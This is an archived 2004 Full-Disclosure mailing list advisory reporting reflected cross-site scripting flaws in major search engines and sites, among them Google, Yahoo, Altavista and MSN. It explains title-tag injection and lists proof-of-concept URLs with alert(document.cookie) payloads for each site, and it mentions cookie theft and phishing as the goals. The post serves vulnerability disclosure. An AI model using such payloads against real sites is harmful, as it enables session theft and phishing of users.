Full Disclosure mailing list archives
Cross Site Scripting (XSS) on Google, Altavista ,Excite.com,Yahoo etc
From: "E.Kellinis" <me () cipher org uk>
Date: Sun, 25 Jul 2004 20:04:40 -0700
######################################### Service: Search Engines Vendors: Google,Altavista ,Excite.com,Yahoo Metacrawler, Dogpile, Downloads.com, MSN.com Bug: Cross Site Scripting Risk: Medium Or Low or High, depends on your point of view Exploitation: Remote Date: 22 July 2004 Author: Emmanouel Kellinis e-mail: me@cipher(dot)org(dot)uk web: http://www[dot]cipher[dot]org[dot]uk List : BugTraq(SecurityFocus)/Full-Disclosure ######################################### Sometimes Mozilla , IE or Opera are not the main concern for xss attack but websites themselves. There is a XSS vulnerability to all the major search engines ,and not only, web sites. To be honest the following is a very small list of the "funny" XSS vulnerability that people dont pay the needed attention. The XSS vuln is inherited to anyone who is using these search engines, often there is no need to try and find a flaw in their web service directly but you can have the same result with indirect digging. In the following list the most usual approach is javascript poisoning inside the < title> tag. Search engines (and not only) tend to do input/output validation on the searched keyword only inside < body> and not before, so there you go , you just have to do < /title> and write your stuff, or sometimes not even that. Also you will notice that BIG websites do not pay the needed attention in other pages inside their domain except the main. So if you can find an XSS somewhere else you can still get client's cookie (or Phish him or her) which is never a good thing! Most of the following search engines are already informed about the problem, the ones that I didnt inform was because I couldnt find their contact details. Some of the following links may not work but most of them will. Google.com http://googlesite.google.com/search?output=googleabout&site=googlesite &q=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E Metacrawler.com http://www.metacrawler.com/info.metac/search/web/%253C%252Ftitle%253E%253Cbody%2 Bbgcolor%253D%2522blue%2522%253E%253Cscript%253Ealert(document.cookie)%253B% 253C% 252Fscript%253E%253C%252Fbody%253E Excite.com http://msxml.excite.com/info.xcite/search/web/%25253C%25252Ftitle%25253E%25253Cbody% 252Bbgcolor%25253D%252522blue%252522%25253E%25253Cscript%25253Ealert%252528d ocument. cookie%252529%25253B%25253C%25252Fscript%25253E%25253C%25252Fbody%25253E Downloads.com http://www.download.com/3120-20-0.html?qt=%3C%2Ftitle%3E%3Cbody+bgcolor %3D%22blue%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3 E%3C%2Fbody%3E&tg=dl-2001 DogPile.com http://www.dogpile.com/info.dogpl/search/web/%253C%252Ftitle%253E%253C body%2Bbgcolor%253D%2522blue%2522%253E%253Cscript%253Ealert(document.cookie) %253B%253C%252Fscript%253E%253C%252Fbody%253E Altavista.com http://www.altavista.com/web/results?q=</title><body%20bgcolor="blue"> <script>alert(document.cookie);</script></body> Yahoo.com http://us.rd.yahoo.com/reg/sc/nav/*http://www. %20<script>alert(document.cookie);</script> MSN.com [fast response/fixed] http://local.msn.com/results.asp?ec=&zip= </script><script>alert(document.cookie);</script><script> and for the shake of it securityfocus.com [fast response/fixed] : http://www.securityfocus.com/cgi-bin/sfonline/jobs/search_jobs.pl? keyword="%20onfocus="alert(document.cookie);" /\Side note/\ I would ,and not only I , appreciate a list of Security Contact details of at least the fortune 500 companies. (some times is so frustrating to find their security contacts inside their ten billion lines website, that you dont even bother ! ========================================================= *PK:http://www.cipher.org.uk/files/pgp/cipherorguk.public.key.txt ========================================================= _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Cross Site Scripting (XSS) on Google, Altavista ,Excite.com,Yahoo etc E.Kellinis (Jul 25)
- Google recovers after virus hits lee (Jul 26)